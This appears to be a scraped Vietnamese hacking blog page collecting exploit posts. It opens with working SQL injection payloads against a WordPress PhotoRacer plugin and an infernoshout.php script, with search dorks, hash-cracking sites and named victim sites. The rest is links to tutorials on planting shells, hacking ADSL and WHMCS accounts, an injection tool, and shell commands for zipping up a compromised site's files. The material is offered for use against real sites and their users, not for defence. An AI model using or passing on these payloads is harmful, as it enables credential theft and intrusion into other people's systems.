WordPress PhotoRacer Plugin(Attachment) SQL Exploit

Hi aLL ! I am OrucReis 

Coder ; OrucReis
Country ; TURKEY

I am tell WordPress PhotoRacer Plugin(Attachment).
I have found this vulnerability :)
I hope that is helpful...

Dork ; inurl:"mostvoted.php?pid="

Exploit ; mostvoted.php?pid=-xx union select 1,2,3,4,concat_ws(user_login,user_pass),6,7 from wp_users

OR ;

Username= mostvoted.php?pid=-xx union select 1,2,3,4,user_login,6,7 from wp_users
Password= mostvoted.php?pid=-xx union select 1,2,3,4,user_pass,6,7 from wp_users

Admin Panel= /wp-login.php , /wp-login/ , /wp-admin.php or /wp-admin/

MD5 Crack;
http://hashchecker.de
http://md5cracker.org

Xem Thêm

[New bug] sqli INURL:infernoshout.php

1.Sử dụng dork trên google

INURL:infernoshout.php


2. Exploit link: infernoshout.php?do=options&area=commands


3. Ném vào phần input dòng bên dưới còn output điền gì cũng đc.  

COMMAND INPUT :

Code:

' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#

4. nếu hiện DATABASE ERROR thì xem mã nguồn của nó kéo xuống bên dưới hiện ra kết quả

Đã thử vài site không chơi đc kiểu này 

demo: http://sinhvienphuyen.vn/forum/infernoshout.php
www.saigoncdclub.com/forum/infernoshout.php

Xem Thêm

SQL - TUT Magic convert & Error based

Magic Convert

http://www.mediafire.com/?leuyke4493l30fs

http://www.mediafire.com/?3t414vzrpssd3g1

Xem Thêm

SQL Chanlenger - Luyện tập SQL Injection

Hiện tại đang có 6 level theo mức độ từ dễ đến khó: http://www.zixem.altervista.org/

Xem Thêm

[Video TUT] Up Shell Win Via Bug DNN

www.mediafire.com/?tm1oyua4od1tkeq

Xem Thêm

[TUT] Hack Account ADSL VNPT [8/7/2012]

TUT này nhìn sơ thì có vẻ k có gì nguy hiểm... nhưng nếu chúng ta biết cách thì có thể đổ cmd vào đó... và dùng thêm dyndns để cập nhật ip .. (nếu victim có dis ra thì Ip sẽ thay đổi) TUT này có thể áp dụng cho cả FPT Link: http://www.mediafire.com/?7h955j77ge094ew TUT này k có gì đặc sắc .. những ai chưa biết thì có thể xem để biết thêm

Xem Thêm

Local bypass ip/~user

Tutorial: http://www.mediafire.com/?k9a8xo26e66ck6b

Xem Thêm

bypass[perl][ln][ls][cat]

http://www.mediafire.com/?07pe2z7ga7mdgbm

Xem Thêm

jSQL : Java GUI for database Injection

An easy to use SQL injection tool for retrieving database informations from a distant server.

jSQL Injection features:

• GET, POST, header, cookie methods
• visual, errorbase, blind algorithms
• automatic best algorithms detection
• data retrieving progression
• proxy setting

Download jSQL

Xem Thêm

Lệnh zip code trên shell

Yêu cầu folder cần zip bằng lệnh chmod default 755 nhé
Command
 zip -r -9 file_name.zip [path]
 vd: zip -r -9 kechocgianvn.zip /home/user/public_html
=> web nó có cái gì thì zip nguyên cả đám. mình thường xài lệnh này

 Tar
tar -cvf file_name.tar [path]

 Gz
tar -zcvf file_name.tar.gz [path]

Trong đó [path] là đường dẫn tới user hoặc folder nhé

Xem Thêm

Hack WHMCS

ut by X-T
Anh X-T nhờ Black post dùm ^_^.
ACE trên VHB coi rồi học theo nhá chứ black cũg chưa down về xem .
Link : http://www.mediafire.com/?ykptlrqa5gfx2md

Nguồn VHB

Xem Thêm